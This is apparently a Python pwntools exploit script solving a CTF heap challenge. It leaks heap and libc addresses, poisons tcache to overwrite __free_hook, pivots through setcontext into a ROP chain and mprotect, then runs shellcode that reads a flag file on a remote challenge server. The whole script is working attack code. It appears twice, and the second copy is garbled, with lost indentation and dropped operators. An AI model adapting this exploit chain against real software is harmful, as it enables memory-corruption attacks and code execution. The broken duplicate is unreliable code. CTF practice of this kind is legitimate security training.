hkraw/Euphorbia_pulcherrima_exp.py

## Euphorbia_pulcherrima_exp.py
#!/usr/bin/python3
from pwn import *
from time import sleep
from past.builtins import xrange
import subprocess

# Util
def add(_id,size,data=None,lable=None,leaks=False):
        io.sendlineafter('> ','1')
        io.sendlineafter('Id: ',f'{_id}')
        io.sendlineafter('Size: ',f'{size}')
        if data is None:
                io.sendafter('Data: ','HK')
        else:
                io.sendafter('Data: ',data)
        if leaks==True:
                return
        if lable is None:
                io.sendafter('Label: ','HK')
        else:
                io.sendafter('Label: ',lable)

def view(_id):
        io.sendlineafter('> ','2')
        io.sendlineafter('Id: ',f'{_id}')
        io.recvuntil('leak: ')
        a = io.recvline().strip()
        return [io.recvuntil('Label:'),a]

def delete(_id):
        io.sendlineafter('> ','3')
        io.sendlineafter('Id: ',f'{_id}')

def edit(_id,data):
        io.sendlineafter('> ','4')
        io.sendlineafter('Id: ',f'{_id}')
        io.sendafter('Data: ',data)

def mask(heap_base,target):
        return (heap_base >> 0xc) ^ target

# Struct
'''
typedef struct notes {
        int64 size;
        char* datapointer;
        char[0x10] lable;
}
'''

# Addr
stdout_leak_offset = 0x1e4744
__free_hook = 0x1e6e40
setcontext = 0x53030

# Gadgets
L_POP_RDI = 0x00157659
L_POP_RSI = 0x00150692
L_POP_RDX = 0x0012f699 # rdx ; rxxx ; ret
L_POP_RAX = 0x0010e535
L_SYSCALL = 0x000dfb19

# Hack
def Hack():
        global io

        add(0,0x18) #0
        add(1,0x18) #1
        add(2,0x18) #2
        add(3,0x18) #3
        add(4,0x88) #4
        delete(3)
        delete(0)
        add(0,0x18,lable='A'*0x10+'\x88') #0
        edit(1,b'A'*0x18+p64(0x91)[0:7])
        edit(4,p64(0x21)*(0x88//8))
        delete(0)
        add(0,0x18,lable='A'*0x10+'\x18') #0
        delete(1)
        add(1,0x18,lable='A'*0x10+'\x88') #1
        some_leak,a = view(2)
        heap_base = u64(some_leak[0x2e:0x2e+8])-0x10
        print(hex(heap_base))

        add(3,0x88) #3
        delete(3)
        delete(4)
        delete(0)
        add(0,0x18,lable='a'*0x10+'\xff')
        edit(1,b'A'*0x18+p64(0x21)+p64(0)*3+p64(0x21)+p64(0)*3+p64(0x91)+p64(mask(heap_base,heap_base+0x2a0)))
        delete(0)
        add(4,0x88) #2
        add(3,0x88,p64(0x288)+p64(heap_base+0x10) + p64(0)*2 +p64(0x421)+p64(heap_base+0x4d0)+p64(0)*2+p64(0)*4 + p64(0x208))
        shellcode = asm(f'''
                mov rax, 2
                mov rdi, {heap_base+0x28}
                mov rsi, 0
                syscall
                mov rdi, rax
                mov rax, 0x0
                mov rdx, 0x100
                mov rsi, {heap_base+0x10}
                syscall
                mov rax, 1
                mov rdi, 1
                mov rdx, 0x100
                syscall
        ''',arch='amd64')
        edit(0,p64(0x707070707070707)*3+b'/home/ctf/flag.txt\0'.ljust(0x68,b'\0')+p64(0)+p64(0xa1)+b'\0'*0x98+p64(0x161) + p64(heap_base+0xc0)*6+shellcode)
        edit(3,p64(0x98)+p64(heap_base+0xa0))
        delete(0)
        edit(3,p64(0x98)+p64(heap_base+0xa0))
        edit(0,p16(( (int(a,0)&0xf) << 12) + 0x6c0))
        add(2,0x38,p64(0xfbad1800)+p64(0)*3+p8(0),leaks=True)
        libc_leak = u64(io.recvn(0x10)[0:0x8])
        libc_base = libc_leak - stdout_leak_offset
        print(hex(libc_base))
        print(hex(libc_leak))
#       0x0014b760 mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20]
        io.sendline('aaa')
        edit(0,p64(libc_base+__free_hook))
        delete(4)
        add(4,0x38,p64(libc_base+0x14b760)) #4
        edit(3,p64(0x100)+p64(heap_base+0x90))
        edit(0,p64(0)*3+p64(0x101))
        edit(3,p64(0xf8)+p64(heap_base+0xb0))
        edit(0,p64(0)+p64(heap_base+0xb8)+p64(libc_base+L_POP_RDI)*2 + p64(0)+p64(libc_base+setcontext+61) +\
                p64(libc_base+L_POP_RDI)*2+p64(libc_base+L_POP_RDI)+\
                p64(heap_base)+p64(libc_base+L_POP_RSI)+p64(0x1000)+\
                p64(libc_base+L_POP_RDX)+p64(0x7)+p64(0)+\
                p64(libc_base+L_POP_RAX)+p64(0xa)+\
                p64(libc_base+L_SYSCALL)+p64(heap_base+0x170)+\
                p64(heap_base+0xe8)*3 + p64(libc_base+L_POP_RDI)*1+p64(libc_base+L_POP_RDI)
        )
        pause()
        delete(0)

# Pwn
if __name__=='__main__':
#       io = process('./chall',env={'LD_PRELOAD':'./libc.so.6'})
        io = remote('challs.xmas.htsp.ro',2005)
        Hack()
        io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from time import sleep
	from past.builtins import xrange
	import subprocess

	# Util
	def add(_id,size,data=None,lable=None,leaks=False):
	io.sendlineafter('> ','1')
	io.sendlineafter('Id: ',f'{_id}')
	io.sendlineafter('Size: ',f'{size}')
	if data is None:
	io.sendafter('Data: ','HK')
	else:
	io.sendafter('Data: ',data)
	if leaks==True:
	return
	if lable is None:
	io.sendafter('Label: ','HK')
	else:
	io.sendafter('Label: ',lable)

	def view(_id):
	io.sendlineafter('> ','2')
	io.sendlineafter('Id: ',f'{_id}')
	io.recvuntil('leak: ')
	a = io.recvline().strip()
	return [io.recvuntil('Label:'),a]

	def delete(_id):
	io.sendlineafter('> ','3')
	io.sendlineafter('Id: ',f'{_id}')

	def edit(_id,data):
	io.sendlineafter('> ','4')
	io.sendlineafter('Id: ',f'{_id}')
	io.sendafter('Data: ',data)

	def mask(heap_base,target):
	return (heap_base >> 0xc) ^ target

	# Struct
	'''
	typedef struct notes {
	int64 size;
	char* datapointer;
	char[0x10] lable;
	}
	'''

	# Addr
	stdout_leak_offset = 0x1e4744
	__free_hook = 0x1e6e40
	setcontext = 0x53030

	# Gadgets
	L_POP_RDI = 0x00157659
	L_POP_RSI = 0x00150692
	L_POP_RDX = 0x0012f699 # rdx ; rxxx ; ret
	L_POP_RAX = 0x0010e535
	L_SYSCALL = 0x000dfb19

	# Hack
	def Hack():
	global io

	add(0,0x18) #0
	add(1,0x18) #1
	add(2,0x18) #2
	add(3,0x18) #3
	add(4,0x88) #4
	delete(3)
	delete(0)
	add(0,0x18,lable='A'*0x10+'\x88') #0
	edit(1,b'A'*0x18+p64(0x91)[0:7])
	edit(4,p64(0x21)*(0x88//8))
	delete(0)
	add(0,0x18,lable='A'*0x10+'\x18') #0
	delete(1)
	add(1,0x18,lable='A'*0x10+'\x88') #1
	some_leak,a = view(2)
	heap_base = u64(some_leak[0x2e:0x2e+8])-0x10
	print(hex(heap_base))

	add(3,0x88) #3
	delete(3)
	delete(4)
	delete(0)
	add(0,0x18,lable='a'*0x10+'\xff')
	edit(1,b'A'0x18+p64(0x21)+p64(0)3+p64(0x21)+p64(0)*3+p64(0x91)+p64(mask(heap_base,heap_base+0x2a0)))
	delete(0)
	add(4,0x88) #2
	add(3,0x88,p64(0x288)+p64(heap_base+0x10) + p64(0)2 +p64(0x421)+p64(heap_base+0x4d0)+p64(0)2+p64(0)*4 + p64(0x208))
	shellcode = asm(f'''
	mov rax, 2
	mov rdi, {heap_base+0x28}
	mov rsi, 0
	syscall
	mov rdi, rax
	mov rax, 0x0
	mov rdx, 0x100
	mov rsi, {heap_base+0x10}
	syscall
	mov rax, 1
	mov rdi, 1
	mov rdx, 0x100
	syscall
	''',arch='amd64')
	edit(0,p64(0x707070707070707)3+b'/home/ctf/flag.txt\0'.ljust(0x68,b'\0')+p64(0)+p64(0xa1)+b'\0'0x98+p64(0x161) + p64(heap_base+0xc0)*6+shellcode)
	edit(3,p64(0x98)+p64(heap_base+0xa0))
	delete(0)
	edit(3,p64(0x98)+p64(heap_base+0xa0))
	edit(0,p16(( (int(a,0)&0xf) << 12) + 0x6c0))
	add(2,0x38,p64(0xfbad1800)+p64(0)*3+p8(0),leaks=True)
	libc_leak = u64(io.recvn(0x10)[0:0x8])
	libc_base = libc_leak - stdout_leak_offset
	print(hex(libc_base))
	print(hex(libc_leak))
	# 0x0014b760 mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20]
	io.sendline('aaa')
	edit(0,p64(libc_base+__free_hook))
	delete(4)
	add(4,0x38,p64(libc_base+0x14b760)) #4
	edit(3,p64(0x100)+p64(heap_base+0x90))
	edit(0,p64(0)*3+p64(0x101))
	edit(3,p64(0xf8)+p64(heap_base+0xb0))
	edit(0,p64(0)+p64(heap_base+0xb8)+p64(libc_base+L_POP_RDI)*2 + p64(0)+p64(libc_base+setcontext+61) +\
	p64(libc_base+L_POP_RDI)*2+p64(libc_base+L_POP_RDI)+\
	p64(heap_base)+p64(libc_base+L_POP_RSI)+p64(0x1000)+\
	p64(libc_base+L_POP_RDX)+p64(0x7)+p64(0)+\
	p64(libc_base+L_POP_RAX)+p64(0xa)+\
	p64(libc_base+L_SYSCALL)+p64(heap_base+0x170)+\
	p64(heap_base+0xe8)3 + p64(libc_base+L_POP_RDI)1+p64(libc_base+L_POP_RDI)
	)
	pause()
	delete(0)

	# Pwn
	if __name__=='__main__':
	# io = process('./chall',env={'LD_PRELOAD':'./libc.so.6'})
	io = remote('challs.xmas.htsp.ro',2005)
	Hack()
	io.interactive()